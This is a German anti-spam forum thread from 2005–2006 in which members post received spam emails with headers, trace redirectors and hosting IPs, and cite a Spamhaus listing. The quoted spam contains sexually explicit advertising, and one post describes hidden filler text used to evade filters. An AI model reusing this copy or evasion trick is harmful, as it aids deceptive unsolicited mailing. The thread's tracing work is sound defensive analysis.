dns1.bippy.info A 218.65.209.24

dns2.bippy.info A 221.11.134.43
dns3.bippy.info A 221.11.134.43

dns4.bippy.info A 218.65.209.26

und Spamhaus meint dazu:

ef: SBL34991

218.65.209.24/32 is listed on the Spamhaus Block List (SBL)

21-Nov-2005 05:09 GMT | SR02

Alex Blood / Alexander Mosh / AlekseyB / Alex Polyakov
218.65.209.24/32 is listed on the Register Of Known Spam Operations (ROKSO)
database as being assigned to, under the control of, or providing service to a
known professional spam operation run by Alex Blood / Alexander Mosh / AlekseyB
/ Alex Polyakov.
sweetsitesonline.info
$ host sweetsitesonline.info
sweetsitesonline.info has address 218.65.209.24

Nach Mailtrain und Leo lässt man nun also durch einen anderen Russen hosten.

- kjz

Investi
07.12.2005, 12:39
Am 3.12. das erste Mal aufgeschlagen:

To: xxxxxx
CC:
Subject: :Größe ist machbar
Date: Mon, 21 Nov 2005 xx:xx:xx +0100
Return-Path: <peter [at] boobie.cc>
Delivered-To: xxxxxxxx
Received: (qmail 17082 invoked by UID: [UID filtered]
X-Ob-Received: from unknown (192.168.8.75) by mta45-1.us4.outblaze.com; 22 Nov 2005 xx:xx:xx -0000
Received: from boobie.cc (unknown [213.159.10.213]) by spf-jail3.us4.outblaze.com (Postfix) with ESMTP ID: [ID filtered]
Received: from 10.0.101.3 by boobie.cc with asmtp (Exim) ID: [ID filtered]
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: text/plain; format=flowed; charset="iso-8859-1"; reply-type=original
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-Msmail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2670
X-Mimeole: Produced By Microsoft MimeOLE V6.00.2900.2670
Liebe Mä nner, sein Sie doch mal ganz ehrlich zu sich selbst. Könnten es
unten rum nicht doch ein paar Zentimeter mehr sein? Könnte der
Geschlechts-verk-ehr nicht doch etwas intensiver sein, oder vielleicht mal
länger dauern als die üblichen 15 Minuten und Schluss? Größe und Ausdauer
ist machbar und zwar mit einem absolut ne-uen und medizinisch, sowie qu
alitativ geprüften Produkt. Konku-rrenzlos günstig und nur hier im
Dir-ektvertr-ieb erhältlich.

Machen sie mehr aus sich und zwar ganz ohne Nebenwirkungen und zu einem
finanziellen Bruchteil von dem, was eine Operation zur Verlängerung kosten
würde, wobei ein Eingriff auch noch lange nicht die Samenproduktion anregt
und auch nicht die Empfindungen fördert. Unser Produkt lässt sie auch und
gerade in diesem Bereich nicht im Stich und ermöglicht Ihnen in wenigen
Wochen ein völlig neues Empfin den beim Sex.

Überzeugen sie sich selbst. Egal ob älter oder jung, groß oder klein,
hetero- oder hom osexuell. Unser Produkt ist für jeden Mann geeignet und
frei von Neben- und Wechselwirkungen. Jetzt bestellen und wirklich mehr aus
sich machen.
http://www.boobie.cc/?ml=1&MID=10042129&WMID=63172&Spon=platb

Sie waren von diesem Angebot nicht angetan oder überzeugt? Schade, aber wir
informieren sie alsbald schon zu neuen, sexy Themen rund um den Bereich der
Er otik und der Lust. Trotzdem abmelden? Dann nutzen sie bitte diesen Link.
http://www.boobie.cc/a.php?adr=xxxxxx

UM557187

12 15 16 19 25 34 55 56

99 44 11 18 24 33 54 57

webeinspunktnull
08.12.2005, 12:58
Die Forensuche hat das Ausgespuckt.. Falls es nicht von Cyberservices ist bitte verschieben


From fbldvdiqxajg [at] mail2way.com Wed Dec 7 xx:xx:xx 2005
Return-Path: <fbldvdiqxajg [at] mail2way.com>
X-Flags: 1001
Delivered-To: GMX delivery to poor [at] spamvictim.tld
Received: (qmail invoked by alias); 07 Dec 2005 xx:xx:xx -0000
Received: from server2.marlinenergy.com (HELO server2.marlinenergy.com) [64.58.199.99]
by mx0.gmx.net (mx053) with SMTP; 07 Dec 2005 xx:xx:xx +0100
Received: (from fbldvdiqxajg [at] mail2way.com)
by agony.act.uji.es (8.9.3/8.9.3) ID: [ID filtered]
Thu, 08 Dec 2005 xx:xx:xx +0200
Resent-Date: Wed, 07 Dec 2005 xx:xx:xx -0100
Date: Thu, 08 Dec 2005 xx:xx:xx +0300
From: "Kino-News" <fbldvdiqxajg [at] mail2way.com>
To: nussy at gmx.net ( war nicht meine mailaddy - bin wohl im BCC )
Subject: SEeXx-Videos downloaDEN
X-Mailer: Ximian Evolution 1.0.3.99
X-X-Sender: <econometrica [at] amon.linen.unizar.es>
Message-ID: [ID filtered]
X-GMX-Antivirus: -1 (not scanned, may not use virus scanner)
X-GMX-Antispam: 0 (Mail was not recognized as spam)
X-GMX-UID: [UID filtered]



Was ist On Demand Pornos ueberhaupt ?
On Demand Pornos ist das ultimative Download Portal
f=FCr FSK18 Hardcore Spielfilm-DVD's.

http://www.www.herbstlinks.info/videos_on_demand/

Sie waehlen einfach eine Rubrik die Sie interessiert,
kucken sich die Vorschau zu dieser DVD an und laden
diese auf ihren Rechner.
Anschliessend kannst du dir die Filme sogar brennen
und jederzeit wieder angucken!!!

Also worauf wartest du noch ?
www.herbstlinks.info/videos_on_demand/

****************************************************



Es gab einige Problem mit dem austragen. Bitte machen
sie dies erneut. Eine Austragung erfolgt dann auch!!!

http://www.herbstlinks.info/out.php/

Netter Disclaimer.... warum mich austragen wenn ich mich nicht eingetragen habe???
Und warum erneut austragen wenn ich diese Spam zum ersten Mal bekomme. Und mich auch noch nicht erstmalig ausgetragen habe udn das auch nicht tun werde, da ich nichts verifizieren werde...

homer
08.12.2005, 14:50
Netter Disclaimer.... warum mich austragen wenn ich mich nicht eingetragen habe???
Und warum erneut austragen wenn ich diese Spam zum ersten Mal bekomme. Und mich auch noch nicht erstmalig ausgetragen habe udn das auch nicht tun werde, da ich nichts verifizieren werde...
Das hab ich mir auch immer gedacht. Bis ich mich dann doch mal ausgetragen hab, seitdem ist Ruhe.
Ich hab allerdings nicht einen der Links in den Spams genutzt, sondern die Spam-Beschwerdestelle der Verbraucherzentrale (http://www.vzbv.de/start/index.php?page=themen&bereichs_id=8&themen_id=36&mit_id=608&task=mit) :D

webeinspunktnull
13.12.2005, 23:13
Im Spamverdacht gelandet wos hingehört

GMX Spamschutz Briefkopf-Analyzer: Der Header dieser e-mail weist für
Spam-Mails typische Merkmale auf.

From srfchkozy [at] mail2florida.com Mon Dec 12 xx:xx:xx 2005
Return-Path: <srfchkozy [at] mail2florida.com>
X-Flags: 1001
Delivered-To: GMX delivery to
Received: (qmail invoked by alias); 12 Dec 2005 xx:xx:xx -0000
Received: from TCE-E-7-182-31.bta.net.cn (HELO TCE-E-7-182-31.bta.net.cn) [202.106.182.31]
by mx0.gmx.net (mx038) with SMTP; 13 Dec 2005 xx:xx:xx +0100
Received: from 106.114.207.244 by 202.106.182.31; Mon, 12 Dec 2005 xx:xx:xx -0300
Message-ID: [ID filtered]
From: "Heiko" <srfchkozy [at] mail2florida.com>
Reply-To: "Heiko" <srfchkozy [at] mail2florida.com>
To:
Subject: Re: Angebot
Date: Tue, 13 Dec 2005 xx:xx:xx +0400
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
X-Mailer: The Bat! (v1.52f) Business fXeNfJenscarl0gh
X-Webmail-Time: Tue, 13 Dec 2005 xx:xx:xx +0100
X-GMX-Antivirus: -1 (not scanned, may not use virus scanner)
X-GMX-Antispam: 5 (Score=9.839; MSGID_SPAM_CAPS FORGED_MUA_THEBAT_CS RCVD_DOUBLE_IP_SPAM)
X-GMX-UID: [UID filtered]

----9046849476227791628
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Die Qual der Wahl hat jeder, der einfach im Netz
nach Erotikseiten sucht und oftmals endet diese
schier endlose Suche auf billigen Seiten, mit
wenig Inhalten und teuren Abzockerpreisen.
Das XXX Portal liefert eine umfassende =DCbersicht
=FCber die besten Erotikseiten, themensortiert
und handverlesen.

portal.freeworld.cc

Die absoluten Top 5 findest Du auch direkt auf
der ersten Seite

portal.freeworld.cc






Du m=F6chtest keine weiteren Angebote mehr erhalten?
portal.freeworld.cc/revoke.php


----9046849476227791628--

Nebelwolf †
13.12.2005, 23:41
Cyberservice: http://www.antispam-ev.de/forum/showthread.php?t=8345
Geheimtip: Suchen im Forum

Nebelwolf

webeinspunktnull
14.12.2005, 14:52
mit Suchstring freeworld.cc kam nichts. Sorry. ich benutze die Forensuche nämlich immer vorm Posten... So schlau bin ich als langjährige Forenadmin nämlich auch... <fg> ;-)

@ Mods Bitte zusammenfügen

Grüssle Pat

exe
18.12.2005, 15:33
Beworben wurde freeworld.cc:

Return-Path: <ibofgf [at] mail2indiana.com>
X-Original-To: *
Delivered-To: *
Received: from localhost (localhost.localdomain [127.0.0.1])
by mail.*.de (*) with ESMTP ID: [ID filtered]
for <*>; Sun, 18 Dec 2005 xx:xx:xx +0100 (CET)
Received: from mail.*.de ([127.0.0.1])
by localhost (mail.*.de [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP ID: [ID filtered]
Sun, 18 Dec 2005 xx:xx:xx +0100 (CET)
Received: from p54A7C8A5.dip.t-dialin.net (p54A7C8A5.dip.t-dialin.net [84.167.200.165])
by mail.*.de (*) with SMTP ID: [ID filtered]
for <*>; Sun, 18 Dec 2005 xx:xx:xx +0100 (CET)
Received: from 99.116.79.237 by 84.167.200.165; Sun, 18 Dec 2005 xx:xx:xx -0500
Message-ID: [ID filtered]
From: "Marco" <ibofgf [at] mail2indiana.com>
Reply-To: "Marco" <ibofgf [at] mail2indiana.com>
To: *
Subject: ***SPAM*** Wichtig
Date: Sun, 18 Dec 2005 xx:xx:xx -0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
X-Mailer: Internet Mail Service (5.5.2650.21 jxRDWXarekjkw)
X-IP: 228.4.242.108
X-UID: [UID filtered]
X-Length: 3000

----496040689024025025
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Wurde die eMail tatsächlich über eine Telekomiker-IP eingeworfen? Zumindest ist sie angeblich ein Openrelay:
http://cbl.abuseat.org/lookup.cgi?ip=84.167.200.165&.submit=Lookup

Vorallem was bedeutet die Zeile:

X-IP: 228.4.242.108
Die IP-Adresse ist eine im aus dem Bereich der für Multicast reserviert ist. :confused:

Goofy
18.12.2005, 17:49
84.167.200.165 ist bei T-Com, wahrscheinlich vireninfiziert.
Die abuseat.org-Seite sagt es auch schon, dass z.B. der Sober-Virus
aus der infizierten Kiste ein open-relay macht.

228.4.242.108 ist offensichtlich von der IANA nicht vergeben.
Daher ist die X-IP-Zeile wohl eine Spammer-Fälschung zur
Irreführung.

Investi
18.02.2006, 23:36
Nach monatelanger Ruhe auf meinem Haupt-Mailaccount ging es vor wenigen Tagen wieder los. Täglich zwei bis vier Mails mit folgendem Inhalt:

Hier bist Du genau richtig! Dies ist die Seite auf der Du findest was Du suchst: GEILEN UND UNKOMPLIZIERTEN SEX, ohne irgendwelche Verplichtungen einzugehen!

In unserer Datenbank findest Du mehr als 250,000 Profile fickgeiler Schlampen, die es mal wieder so richtig besorgt bekommen wollen (aus Deutschland, Osterreich und Die Schweiz).

Nie was es einfacher, das nachste Date und den nachsten Betthasen klar zu machen! Sie Dich einfach in der riesigen Datenbank um und such Dir das Madel aus, das Dir gefallt und tritt mit ihr in Kontakt!

Jetzt Mitglied werden: http://voe.infoblaster.cc/de/index.html




Wenn Du diesen Newsletter nicht mehr erhalten möchtest, klicke einfach auf diesen Link: http://voe.infoblaster.cc/revoke.php

Header weisen immer unterschiedliche Daten auf, also scheinen es wohl schlechte Fälschunegn zu sein:
Return-Path: <Dick5393 [at] indiatimes.com>
Received: from nameres.kanto-gakuin.ac.jp (fw1-0.kanto-gakuin.ac.jp [150.38.210.2])
by wwwtxn.han-solo.net (8.13.5/8.12.9) with ESMTP ID: [ID filtered]
for <gutschein [at] ----.de>; Sat, 18 Feb 2006 xx:xx:xx +0100
X-KSD: <gutschein [at] ----.de>
Received: from localhost (localhost [127.0.0.1])
by localhost.kanto-gakuin.ac.jp (Postfix) with SMTP ID: [ID filtered]
Sat, 18 Feb 2006 xx:xx:xx +0900 (JST)
Received: from kojin.kanto-gakuin.ac.jp (ftp.kanto-gakuin.ac.jp [150.38.50.37])
by nameres.kanto-gakuin.ac.jp (Postfix) with SMTP ID: [ID filtered]
Sat, 18 Feb 2006 xx:xx:xx +0900 (JST)
Received: from kojin.kanto-gakuin.ac.jp by kojin.kanto-gakuin.ac.jp
via smtpd (for fw1-0.kanto-gakuin.ac.jp [150.38.210.2]) with ESMTP; Sat, 18 Feb 2006 xx:xx:xx +0900
Message-ID: [ID filtered]
To: gutschein [at] ----.de
Cc: diverse Adressen
From: "Hendrik Guelcher" <Dick5393 [at] indiatimes.com>
Subject: Fwd: Re:: Du wiillst Heeute noch realen Sex haben? (ist Tod )
Date: Fri, 17 February 2006 xx:xx:xx GMT
MIME-Version: 1.0
Content-Type: text/html; charset=iso-8859-1
Reply-To: Dick5393 [at] indiatimes.com
X-Priority: 5
X-MSMail-Priority: Low
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
X-Mailer: Windows Eudora Light Version 1.5.4 (32)
X-Virus-Scanned: ClamAV version 0.87.1, clamav-milter version 0.87 on 83.138.67.148
X-Virus-Status: Clean
Status: RO
X-Spam-Flag: No
X-Spam-Level: 2/5
Außerdem ist an die Texte immer noch das bekannte Spamschutz-Umgehungs-BlaBla dran (weiße Schrift auf weißem Grund):

(Seiten sind seien Dr. Japan Opfer wichtig wollten Richter Rußland denn Bild Arbeit verloren gesagt denn werde letzten Berlin alte zufolge aus Sprache Münchner völlig einst Er recht etwa mindestens bekannt durch machen System ein da Auch Amt gemacht sechs könnte Bürger Auftrag groß statt Für gebracht Geschichte gut Weg statt Chancen zum Bundes- Dezember wie einem Roman vor deutschen August Welt größte keit wählen meine das früher Parlament gehören Geld zweite Kosten leicht stellen neu Schule richtig sprach unter früher Boden bieten sehr Arbeits- Selbst letzten Bevölkerung eigenen neue klar Wie Produktion dritten nahm Aktien Industrie Kreis bekannt hatten einfach Freitag FDP Boden Jahres jeden möchte nehmen Leben kleinen deutlich Frankfurt allen also Nacht gilt Dies mindestens Universität Vertreter verschiedenen Kollegen Stück vielleicht anderem Grünen Sonntag großer beispielsweise sofort alles Mit nicht stellt neuen anderem Aktien Platz sie lassen dagegen Donnerstag derzeit Dieser sind gefunden denn per Juli Zuschauer fest )

kjz1
25.04.2006, 21:25
Und Cyberservices fängt wieder an, diesmal über 3 Weiterleitungen getarnt:

Zunächst beworben wird: http://VMVMBFKZ56.INFO.

Dies ist ein Tucows-Redirector, der sehr gerne von Spammern verwendet wird, da Tucows/Registerfly zu 100% merkbefreit ist. Das leitet dann weiter zu einem Freehoster:

http://clessko2.freehostpro.com

Und von hier noch mal weiter, wo es dann endgültig zur Sache geht:

http://www.extremesexchannels.tv

mit der WMID=71399. Und gehostet ist das ganze auf: 217.173.159.57, 217.173.159.58, 217.173.159.59, 217.173.159.60, 217.173.159.61, 217.173.159.62. Und wo ist das: selbstverständlich bei unseren altbekannten aktenkundigen 'Freunden' von Titan Networks....

- kjz

Stardust
25.04.2006, 21:53
Siehe auch hier (http://www.antispam-ev.de/forum/showthread.php?t=10778).

oliveer
27.04.2006, 06:06
Return-Path: <esiidt [at] netforward.com>
X-Original-To: xxx
Received: from localhost (mail-in-04.arcor-online.net [151.189.21.44])
by mail-in-08-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Wed, 26 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-04.arcor-online.net ([127.0.0.1])
by localhost (mail-in-04 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from netease.com (m208.net85-169-188.noos.fr [85.169.188.208])
by mail-in-04.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Wed, 26 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from localhost (jana [127.0.0.1])
by 178.40.55.216 (Postfix) with SMTP ID: [ID filtered]
Date: Wed, 26 Apr 2006 xx:xx:xx -0-200
From: "esiidt" <esiidt [at] netforward.com>
X-Mailer: The Bat! (v1.60c) Business
Reply-To: esiidt" esiidt [at] netforward.com>
X-Priority: 3 (Normal)
Message-ID: [ID filtered]
To: <xxx>
Cc: 12 eMail-Adressen
Subject: Das erste Mal richtig heißen Sex (5b1Bb)
MIME-Version: 1.0
Content-Type: text/plain;
Content-Transfer-Encoding: 7Bit
X-Virus-Scanned: amavisd-new at arcor.de
X-Amavis-Alert: BAD HEADER Non-encoded 8-bit data (char DF hex) in message header 'Subject': Subject: Das erste Mal richtig hei\337en Sex (5b1Bb)\n

Na bauernpower,

Wenn Mama und Papa das wüssten... da fahren die lieben und braven Töchter das erste Mal
alleine in den Urlaub und haben allerdings nur ein Ziel. Hier, auf der Partyinsel Mallorca,
soll es passieren. Das erste Mal richtig heißen Sex erleben und sich nach Strich und Faden
vögeln lassen. Reality pur und absolut unverfälscht. Wir waren exklusiv mit der Kamera dabei
und zeigen dir hier absolut echtes und extrem versautes Material, welches du wirklich nur
hier und nirgendwo sonst bekommen wirst.
Sonne, Sommer, Urlaub, Party, sexy Girls und ganz viel heißer Sex...

http://vmvmbfkz56.info/15.html - Weiterleitung auf http://www.mallorcateens.com/

tschuess
esiidt

11b11
711b

-------------------------------------------------------------------------------------
Moechtest du dich abmelden? Sende eine eMail
mit dem Titel "abmelden" an byebye987 [at] netscape.net


Return-Path: <sokagdax [at] journey.com>
X-Original-To: xxx
Received: from localhost (mail-in-08.arcor-online.net [151.189.21.48])
by mail-in-07-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Wed, 26 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-08.arcor-online.net ([127.0.0.1])
by localhost (mail-in-08 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from gdinet.com (unknown [211.215.17.73])
by mail-in-08.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Wed, 26 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from 131.113.17.28 by 211.215.17.73; Wed, 26 Apr 2006 xx:xx:xx -0-200
From: "sokagdax" <sokagdax [at] journey.com>
Reply-To: "sokagdax" <sokagdax [at] journey.com>
To: 12 eMail-Adressen
Subject: im WEB flirten und baggern (31BbB)
Date: Wed, 26 Apr 2006 xx:xx:xx -0-200
Message-ID: [ID filtered]
Content-Type: multipart/alternative;
boundary="--105852101120505437"
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: MIME-tools 5.503 (Entity 5.501)
X-MimeOLE: Produced By MIME-tools 5.503 (Entity 5.501)
X-Virus-Scanned: amavisd-new at arcor.de

Hi lars-l,

Einfach anmelden und mit den neuesten Features im WEB flirten und baggern, was das Zeug hält.
Auch eine, oder mehrere Videobotschaften kannst du hoch laden und deinem Profil hinzufügen.
So macht man sich richtig interessant.

http://vmvmbfkz56.info/14.html - Weiterleitung auf http://www.affaire.com

bye
sokagdax

5B1b1
6111

-------------------------------------------------------------------------------------
Moechtest du dich abmelden? Sende eine eMail
mit dem Titel "abmelden" an byebye987 [at] netscape.net


Return-Path: <kgmmnsdtouh [at] myway.com>
X-Original-To: xxx
Received: from localhost (mail-in-05.arcor-online.net [151.189.21.45])
by mail-in-09-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Tue, 25 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-05.arcor-online.net ([127.0.0.1])
by localhost (mail-in-05 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from mylinuxisp.com (rrcs-70-61-191-87.central.biz.rr.com [70.61.191.87])
by mail-in-05.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Tue, 25 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from 4AN8
by myway.com with SMTP ID: [ID filtered]
for <xxx>; Tue, 25 Apr 2006 xx:xx:xx -0-200
From: "kgmmnsdtouh" <kgmmnsdtouh [at] myway.com>
To: <xxx>
Cc: 12 eMail-Adressen
Subject: Belastungstest (011b1)
Message-ID: [ID filtered]
X-Mailer: MIME-tools 5.503 (Entity 5.501)
X-MimeOLE: Produced By MIME-tools 5.503 (Entity 5.501)
X-Priority: 3 (Normal)
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="--2151331067187962664"
Date: Tue, 25 Apr 2006 xx:xx:xx +0200 (CEST)
X-Virus-Scanned: amavisd-new at arcor.de
Hi drome,

Und wieder eine süsse Schlampe, die von Peter zum Star gemacht wird:
Die 19 jährige Sandra ist bereit einiges in Kauf zu nehmen, um ein berühmtes Fotomodell
zu werden. Um sie gross rauszubringen muss sie selbstverständlich alle Tricks beigebracht
bekommen, die man drauf haben muss, um auch erfolgreich zu sein! Deshalb unterzieht
Peter ihren Kopf und ihrer Kehle erstmal einen Belastungstest.

http://vmvmbfkz56.info/13.html - Weiterleitung auf http://www.peter-enis.com/

ciao
kgmmnsdtouh

6b111
4bBb

-------------------------------------------------------------------------------------
Moechtest du dich abmelden? Sende eine eMail
mit dem Titel "abmelden" an byebye987 [at] netscape.net


Ich kenn da so einen Anwalt in Hamburg, der soll diesen Drecksverein vertreten und der ein inniger Fan von so einem Müll ist - kann er gerne haben per Weiterleitung.

Ich warte ja nur drauf, dass er sich mal bei mir beschwert, dass ich ihm vollspamme. :rolleyes: Aber dazu ist dieses Teil viel zu feige...

Diesmal haben die sich wohl auf nexgo-eMail-Adressen spezialisiert.

in diesem Sinne

Oliver

Stardust
27.04.2006, 10:59
Diesmal haben die sich wohl auf nexgo-eMail-Adressen spezialisiert.

in diesem Sinne

Oliver

Nicht nur, arcor ist auch betroffen, wird mal als Spam erkannt, mal nicht:mad:

speimanes
27.04.2006, 14:58
Habe ich auch jeden Tag in meinem web.de Postfach. Lese ich kurz und dann ab damit in den Rundordner-P

Stardust
27.04.2006, 16:17
Wie, du liest sie? Sind doch schon am Betreff zu erkennen. Offnen tue ich sie nur, wenn es mal wieder ein neuer Betreff ist und ich ihn hier posten will.

oliveer
27.04.2006, 19:57
Return-Path: <ugyvdgbp [at] arkansas.net>
X-Original-To: xxx
Received: from localhost (mail-in-06.arcor-online.net [151.189.21.46])
by mail-in-10-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Thu, 27 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-01.arcor-online.net ([127.0.0.1])
by localhost (mail-in-06 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from rr.com (unknown [147.160.181.80])
by mail-in-01.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Thu, 27 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from 53.78.230.14 by 239.32.240.140.arkansas.net with DAV;
Thu, 27 Apr 2006 xx:xx:xx -0-200
Reply-To: "ugyvdgbp" <ugyvdgbp [at] arkansas.net>
From: "ugyvdgbp" <xxx>
To: 8 eMail-Adressen
Subject: Nutten am Start (311bb)
Date: Thu, 27 Apr 2006 xx:xx:xx -0-200
Message-ID: [ID filtered]
X-Mailer: Microsoft Outlook Express 6.00.2800.1437
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_000A_01C66A1B.C1161930"
X-Virus-Scanned: amavisd-new at arcor.de

Hi knilb,

Hi, ich bin Sheila und komme aus Ungarn. Ich bin eine wunderschöne Nymphe mit einer
absolut traumhaften Oberweite, die dich verzaubern wird. Mit meinem super Service
(ZK's, FO, AV) werde ich dir den Kopf verdrehen und alle deine Fantasien werden
Wirklichkeit. Wenn du also Lust auf mich hast, dann

http://erg9zfdghj.info/16.html - Weiterleitung auf http://www.hure.de

ciao
ugyvdgbp

8Bb1b
3111

-------------------------------------------------------------------------------------
Moechtest du dich abmelden? Sende eine eMail
mit dem Titel "abmelden" an byebye987 [at] netscape.net

So, jetzt ist Schluß mit lustig - wenn dieser "seriöse" Rechtsverdreher seine lustige .de-Domain bewerben will gibt es jetzt richtig eins auf die Finger !

in diesem Sinne

Oliver

dk99hi
27.04.2006, 21:39
Grad mit Link zu http://erg9zfdghj.info/16.html bekommen.

Leitet weiter zu http://clessko2.freehostpro.com/16.html?

Von dort geht es zu http://www.hure.de/?WMID=71399&WMEC=6&PID=2

Da die Spammer hier mitlesen:

Wie wäre es wenn Sie mehr in die "Qualität" Ihrer Anbebote, anstatt in Spam, investieren würden?:confused:

Wurgl
27.04.2006, 21:50
Von dort geht es zu http://www.hure.de/?WMID=71399&WMEC=6&PID=2


Hmm und dort sitzt ein Hamburger Anwalt als Admin-C ...



Da die Spammer hier mitlesen:


Dann liest der Admin-C ja mit und kann sich selber eine qualifizierte Meinung zu diesem Zitat (http://www.r-archiv.de/article2383.html) bilden :D

Die von der Rechtsprechung entwickelte Störerhaftung - sie war und ist ja immer wieder einmal Diskussionsthema - erscheint nicht mehr überschaubar.

Was sich nicht unmittelbar, nur über erhebliche Probleme oder nicht sach- oder Interessengerecht mit den gesetzlichen Regelungen lösen lässt wird über die Grundsätze der Störerhaftung "gelöst".


Vielleicht kommt er ja zu einem Entschluss, der den Spam eindämmt?

oliveer
27.04.2006, 21:58
Kann das sein, dass dieser überaus fähige Rechtsverdreher kein Impressum auf seiner Seite hat ? :confused:

in diesem Sinne

Oliver

Wurgl
27.04.2006, 22:02
Kann das sein, dass dieser überaus fähige Rechtsverdreher kein Impressum auf seiner Seite hat ? :confused:


Putz mal die Brille :p, ich seh ein Impressum.

Dotshead
27.04.2006, 22:09
Nun ja auf http://www.pornoanwalt.de hat er keins. Da die Seite ja auch keine Inhalte anbietet, ist es IMHO ok. ;)

contrawerbemails
28.04.2006, 19:11
212.112.210.7 - IP hosts 42 Total Domains ...
Showing 1 - 42 out of 42

Domain Name
1 1000FREEADULTPICS.COM.
2 1000FREEGAYPICS.COM.
3 49CENTSEX.COM.
4 CALLBOY24.COM.
5 DUMM-GEFICKTE-TEENS.COM.
6 EXIT-CASH.INFO.
7 FREEGAYPLEASURE.COM.
8 FREESEXPLEASURE.COM.
9 GEILEFEIERTAGE.COM.
10 GIRLTRONIC.COM.
11 GRATIS-GAYSEXCHAT.COM.
12 GRATISGAYSEXCHAT.COM.
13 GRATISGAYSHOW.COM.
14 GRATISLIVESEXSHOW.COM.
15 GRATISLIVESHOW.COM.
16 GRATISSEXPHOTOS.COM.
17 GRATISSEXSHOW.COM.
18 GROSSER-PENIS.COM.
19 GROSSERPENIS.COM.
20 HARTEBOYS.COM.
21 IBIZASCHLAMPE.COM.
22 LIVESEX-PER-WEBCAM.COM.
23 LOGOSPASS.COM.
24 NACKTES-HOLLYWOOD.COM.
25 NACKTESHOLLYWOOD.COM.
26 ONLINE-SONDERANGEBOT.COM.
27 P-VERGROESSERUNG.COM.
28 PORNTRONIC.COM.
29 SEX-PER-ANHALTER.COM.
30 SEXMOVIEWORLD.NET.
31 ST-PAULIGIRLS.COM.
32 STPAULIGIRLS.COM.
33 SUPERGAYSHOW.COM.
34 SUPERSEXYCHAT.COM.
35 SUPERSTARQUIZ.COM.
36 TEEN-SEX-MOVIES.NET.
37 TOPBONDAGE.COM.
38 TOPGAYFRANCE.COM.
39 UNZENSIERTER-ANALSEX.COM.
40 WAVEGATESYSTEM.COM.
41 WIR-ZEIGEN-ALLES.COM.
42 XXXPAARE.COM.



Wie kann man denn sowas abfragen? Welche Domains auf einer IP Adresse liegen?

kjz1
28.04.2006, 21:28
Wie kann man denn sowas abfragen? Welche Domains auf einer IP Adresse liegen?

z. Bsp.: hier (http://cert.uni-stuttgart.de/stats/dns-replication.php)

- kjz

oliveer
29.04.2006, 10:39
Return-Path: <lysoofjya [at] theramp.net>
X-Original-To: xxx
Received: from localhost (mail-in-04.arcor-online.net [151.189.21.44])
by mail-in-04-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Thu, 27 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-04.arcor-online.net ([127.0.0.1])
by localhost (mail-in-04 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from telia.com (unknown [83.239.64.242])
by mail-in-04.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Thu, 27 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from 139.106.148.88
by 185.200.63.187.theramp.net (Postfix) with SMTP ID: [ID filtered]
X-Originating-IP: [100.208.181.242]
X-Originating-Email: [lysoofjya [at] theramp.net]
X-Sender: lysoofjya [at] theramp.net
From: "lysoofjya" <lysoofjya [at] theramp.net>
To: <xxx>
Cc: 12 eMail-Adressen
Subject: Anal am Start (7B1bB)
Date: Thu, 27 Apr 2006 xx:xx:xx -0-200
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: [ID filtered]
X-Virus-Scanned: amavisd-new at arcor.de

http://erg9zfdghj.info/16.html - Weiterleitung auf http://www.hure.de/

Return-Path: <cstxatha [at] ncweb.com>
X-Original-To: xxx
Received: from localhost (mail-in-03.arcor-online.net [151.189.21.43])
by mail-in-10-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Fri, 28 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from mail-in-03.arcor-online.net ([127.0.0.1])
by localhost (mail-in-03 [127.0.0.1]) (amavisd-new, port 10024) with LMTP
ID: [ID filtered]
Received: from myexcel.com (unknown [125.249.138.3])
by mail-in-03.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
Fri, 28 Apr 2006 xx:xx:xx +0200 (CEST)
Received: from 145.208.4.181 (unknown [23.247.187.183])
by 71.84.252.237.ncweb.com (Postfix) with SMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Fri, 28 Apr 2006 xx:xx:xx -0-200 (EDT)
Date: Fri, 28 Apr 2006 xx:xx:xx -0-200
